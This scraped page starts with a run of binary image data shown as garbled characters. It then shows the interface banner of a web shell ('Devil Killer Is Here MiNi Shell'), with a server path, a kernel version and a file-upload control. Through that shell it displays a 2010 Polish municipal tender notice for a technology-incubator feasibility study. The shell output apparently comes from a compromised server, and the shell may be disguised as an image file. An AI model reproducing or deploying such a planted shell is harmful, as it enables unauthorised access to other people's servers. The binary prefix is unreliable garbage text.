JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100506/110229-N-2010.html

<p class="kh_header"><b>Dąbrowa Górnicza: Koncepcja utworzenia, organizacji i funkcjonowania kompleksu: inkubator nowych technologii wraz z parkiem naukowo-technologicznym, na  terenie inwestycyjnym TUCZNAWA B w Dąbrowie Górniczej, w ramach projektu:  Kompleksowe przygotowanie terenu inwestycyjnego TUCZNAWA -  DĄBROWSKA STREFA AKTYWNOŚCI GOSPODARCZEJ (TUCZNAWA B) współfinansowanego  przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Poddziałania 6.2.2. Programu Operacyjnego  Innowacyjna Gospodarka na lata 2007 - 2013, w ramach zadania inwestycyjnego: Kompleksowe przygotowanie terenu inwestycyjnego - Tucznawa</b><br>
<b>Numer ogłoszenia: 110229 - 2010; data zamieszczenia: 06.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2956700, faks 032 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Koncepcja utworzenia, organizacji i funkcjonowania kompleksu: inkubator nowych technologii wraz z parkiem naukowo-technologicznym, na  terenie inwestycyjnym TUCZNAWA B w Dąbrowie Górniczej, w ramach projektu:  Kompleksowe przygotowanie terenu inwestycyjnego TUCZNAWA -  DĄBROWSKA STREFA AKTYWNOŚCI GOSPODARCZEJ (TUCZNAWA B) współfinansowanego  przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Poddziałania 6.2.2. Programu Operacyjnego  Innowacyjna Gospodarka na lata 2007 - 2013, w ramach zadania inwestycyjnego: Kompleksowe przygotowanie terenu inwestycyjnego - Tucznawa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia prowadzone w trybie przetargu nieograniczonego o wartości zamówienia poniżej  193 000  EUR  zgodnie  z  postanowieniami Ustawy z dnia 29  stycznia 2004 r. - Prawo zamówień publicznych (Dz.U. z 2007r. Nr 223, poz.1655 z późn. zm.). 
Przedmiotem zamówienia są usługi pn.: Koncepcja utworzenia, organizacji i funkcjonowania kompleksu: inkubator nowych technologii wraz z parkiem naukowo-technologicznym, na  terenie inwestycyjnym TUCZNAWA B w Dąbrowie Górniczej, składającej się z następujących dokumentów szczegółowych:
A.	Koncepcja programowo-organizacyjna dla inkubatora nowych technologii i parku naukowo-technologicznego, wraz ze wskazaniem możliwych, wariantowych rozwiązań dot. zasad funkcjonowania, mechanizmu oraz sposobu  zarządzania kompleksem;
B.	Koncepcja funkcjonalno-użytkowa, w tym architektoniczna zagospodarowania jednej z działek inwestycyjnych obszaru Tucznawa B na potrzeby kompleksu: inkubator nowych technologii wraz z parkiem naukowo-technologicznym;
C.	Studium wykonalności projektu utworzenia, organizacji i funkcjonowania kompleksu: inkubator nowych technologii wraz z parkiem naukowo-technologicznym, na  terenie inwestycyjnym TUCZNAWA B w Dąbrowie Górniczej.
D.	Harmonogram procesu inwestycyjnego projektu utworzenia, organizacji i funkcjonowania kompleksu: inkubator nowych technologii wraz z parkiem naukowo-technologicznym, na  terenie inwestycyjnym TUCZNAWA B w Dąbrowie Górniczej;

Uwagi do przedmiotu zamówienia:
Szczegółowy zakres rzeczowy zamówienia określa: specyfikacja techniczna - Załącznik nr 6, oraz projekt umowy Załącznik nr 7 stanowiące załączniki do specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6, 71.24.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli wykonawca wykaże,
że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie należycie wykonał minimum jedną usługę opracowania, w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, tj.:
- wstępnego studium wykonalności, lub studium wykonalności lub biznes planu w zakresie budowy lub modernizacji parku naukowo-technologicznego, dla której wartość nakładów inwestycyjnych wyniosła co najmniej 25 mln PLN,
lub
- wstępnego studium wykonalności, lub studium wykonalności lub biznes planu w zakresie budowy lub modernizacji inkubatora technologicznego, dla której wartość nakładów inwestycyjnych wyniosła co najmniej 5 mln PLN,
lub
- wstępnego studium wykonalności, lub studium wykonalności lub biznes planu w zakresie budowy lub modernizacji centrum przedsiębiorczości, dla której wartość nakładów inwestycyjnych wyniosła co najmniej 5 mln PLN,
lub
- wstępnego studium wykonalności, lub studium wykonalności lub biznes planu w zakresie budowy lub modernizacji parku przemysłowego, dla której wartość nakładów inwestycyjnych wyniosła co najmniej 25 mln PLN,
lub
- programu funkcjonalno-użytkowego, w zakresie budowy lub modernizacji parku naukowo-technologicznego lub parku przemysłowego, dla której wartość nakładów inwestycyjnych wyniosła co najmniej 25 mln PLN,
oraz załączą dokument potwierdzający, że usługa ta została wykonana należycie.

Ocena spełniania warunków - udziału w postępowaniu (formalnych) i zdolności do wykonania zamówienia (merytorycznych) - wymaganych od Wykonawców będzie dokonane w oparciu o złożone wraz z ofertą, oświadczenia o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia publicznego oraz potwierdzające (spełnienie tych warunków) dokumenty - według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował zespołem składającym się z: Kierownika nadzorującego Projekt i Członków Zespołu realizujących usługę, tj.:
- Kierownik nadzorujący Projekt powinien posiadać doświadczenie zawodowe w zakresie: kierowania pracami nad sporządzeniem studium wykonalności dla projektu o wartości nakładów inwestycyjnych co najmniej 25 mln PLN,
- wykonawca powinien dysponować do wykonania opracowania Zespołem realizującym usługę, w którym powinni znaleźć się eksperci z niżej wymienionych dziedzin:
a)	opracowywania generalnej strategii rozwoju organizacji,
b)	opracowywania badań ankietowych,
c)	wykonywania analiz i projekcji finansowych,
d)	wykonywania analiz społeczno-ekonomicznych metodyką analizy kosztów i korzyści,
e)	wykonywania analiz organizacyjnych,
f)	opracowywania koncepcji, strategii marketingowych lub programów promocji,
g)	kosztorysowania,
h)	projektowania architektonicznego,
i)	wykonywania analiz prawnych.

W zakresie pkt. a) - f) wymagane jest dysponowanie przez Wykonawcę osobami posiadającymi wykształcenie wyższe w zakresie ukończonych następujących kierunków studiów: ekonomia, zarządzanie, marketing, finanse. W zakresie pkt. g) wymagane jest dysponowanie przez Wykonawcę osobami posiadającymi co najmniej 5-cio letnie doświadczenie w kosztorysowaniu projektów, w zakresie pkt. h) dysponowanie osobami posiadającymi uprawnienia architektoniczne w zakresie projektowania architektonicznego, zaś w zakresie pkt. i) dysponowania osobami posiadającymi wykształcenie prawnicze.

Ocena spełniania warunków - udziału w postępowaniu (formalnych) i zdolności do wykonania zamówienia (merytorycznych) - wymaganych od Wykonawców będzie dokonane w oparciu o złożone wraz z ofertą, oświadczenia o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia publicznego oraz potwierdzające (spełnienie tych warunków) dokumenty - według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli wykonawca wykaże, że posiada środki finansowe w wysokości co najmniej 300 000 PLN lub posiada zdolność kredytową w wysokości co najmniej 300 000 PLN.

Ocena spełniania warunków - udziału w postępowaniu (formalnych) i zdolności do wykonania zamówienia (merytorycznych) - wymaganych od Wykonawców będzie dokonane w oparciu o złożone wraz z ofertą, oświadczenia o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia publicznego oraz potwierdzające (spełnienie tych warunków) dokumenty - według formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane usługi spełniają wymagania określone przez Zamawiającego, Zamawiający żąda od Wykonawcy opisów - dokumentów szczegółowych prezentujących metodykę realizacji prac obejmujących:
a)	proponowaną strukturę dokumentu szczegółowego: Koncepcja programowo-organizacyjna wraz ze szczegółowym opisem metodyki jego przygotowania (w tym użytych metod i analiz) dla każdego z proponowanych elementów opracowania (na podstawie załącznika nr 6 Specyfikacja techniczna);
b)	proponowaną strukturę dokumentu szczegółowego: Koncepcja funkcjonalno-użytkowa wraz ze szczegółowym opisem metodyki jego przygotowania (w tym użytych metod i analiz) dla każdego z proponowanych elementów opracowania (na podstawie załącznika nr 6 Specyfikacja techniczna);
c)	proponowaną strukturę dokumentu szczegółowego: Studium wykonalności wraz ze szczegółowym opisem metodyki jego przygotowania (w tym użytych metod i analiz) dla każdego z proponowanych elementów opracowania (na podstawie załącznika nr 6 Specyfikacja techniczna);
d)	proponowaną strukturę dokumentu szczegółowego: Harmonogram procesu inwestycyjnego projektu wraz ze szczegółowym opisem metodyki jego przygotowania (w tym użytych metod i analiz) dla każdego z proponowanych elementów opracowania (na podstawie załącznika nr 6 Specyfikacja techniczna);
e)	proponowany harmonogram realizacji prac wykonawcy Koncepcji obejmującego zadania służące sporządzeniu Koncepcji utworzenia, organizacji i funkcjonowania kompleksu: inkubator nowych technologii wraz z parkiem naukowo-technologicznym, na  terenie inwestycyjnym TUCZNAWA B w Dąbrowie Górniczej i posiadające sprecyzowane terminy wykonania w relacji do poszczególnych elementów dokumentów szczegółowych. Wymaganą postać harmonogramu prac zawiera załącznik nr 8 Formularz harmonogramu prac wykonawcy Koncepcji, do SIWZ;

Załączenia ww. dokumentów szczegółowych Zamawiający żąda w celu dokonania na ich podstawie oceny złożonej oferty w ramach kryterium jakościowego, jakim jest metodyka realizacji prac. 
W zakresie zdolności do wykonania zamówienia przedstawionej w dokumentach prezentujących metodykę realizacji prac (metodyka), tj. dokumentach wymaganych od Wykonawców w oparciu pkt. 8.3 SIWZ - ocena będzie dokonywana w oparciu o skalę punktową określoną w pkt. 24 SIWZ oraz załączniku nr 9 do SIWZ.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto należy przedłożyć:
1. Formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2. Pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w  formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
3. zobowiązanie innych podmiotów, w szczególności pisemne, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane w przypadku gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b ustawy
4. Formularz harmonogramu prac - załącznik nr 8 do SIWZ(wskazana data podpisania);
5. Formularz wyceny prac - załącznik nr 10 do SIWZ(wskazana data podpisania).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Metodyka realizacji prac - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający w § 12 projektu umowy przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach:
1. w zakresie zmiany terminów realizacji zamówienia ujętych w umowie oraz harmonogramie realizacji prac, na skutek: 
a.	wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
b.	skrócenia wymaganego terminu wykonania poszczególnych części zamówień ujętych w umowie, 
w przypadku konieczności natychmiastowej realizacji zamówienia lub na skutek zdarzeń losowych,
c.	zmiany przepisów prawa Unii Europejskiej lub prawa krajowego, co powoduje konieczność dostosowania dokumentacji do zmiany przepisów, które nastąpiły w trakcie realizacji zamówienia,
d.	wstrzymania wykonania opracowania przez Zamawiającego na okres dłuższy niż 14 dni,
e.	przekroczenia terminu podjęcia decyzji, o którym jest mowa w § 5 ust. 5 projektu umowy, nie dłużej jednak niż okres trwania zwłoki w podjęciu decyzji,
f.	konieczności wykonania zamówień dodatkowych, o których mowa w art. 67 ust. 1 pkt. 5 ustawy, których wykonanie jest niezbędne dla prawidłowego wykonania oraz zakończenia podstawowego przedmiotu zamówienia wraz ze wszystkimi konsekwencjami występującymi w związku 
z przedłużeniem tego terminu,

2. W pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
a.	aktualizacja rozwiązań projektowych z uwagi na postęp technologiczny bądź zmiany obowiązujących przepisów,
b.	zmiany obowiązujących przepisów prawa istotnych dla postanowień  zawartej umowy,
c.	rezygnacja z całości lub części zamówienia zgodnie z art. 145 Ustawy Pzp.,
d.	zmniejszenie wynagrodzenia wykonawcy na skutek zmniejszenia ilości i wielkości zamówienia przez Zamawiającego z powodu zdarzeń losowych oraz innych okoliczności niezawinionych przez Zamawiającego,
e.	zmiany podatku VAT na skutek zmian w przepisach prawnych,
f.	zmiany Kierownika nadzorującego Projekt i Członków Zespołu, na skutek zdarzeń losowych, zmian kadrowo- personalnych, utraty wymaganych uprawnień, utraty stanowiska z zastrzeżeniem równoważności uprawnień,
g.	zmiany podwykonawców na zasobach, których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem , że nowy podwykonawca  wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
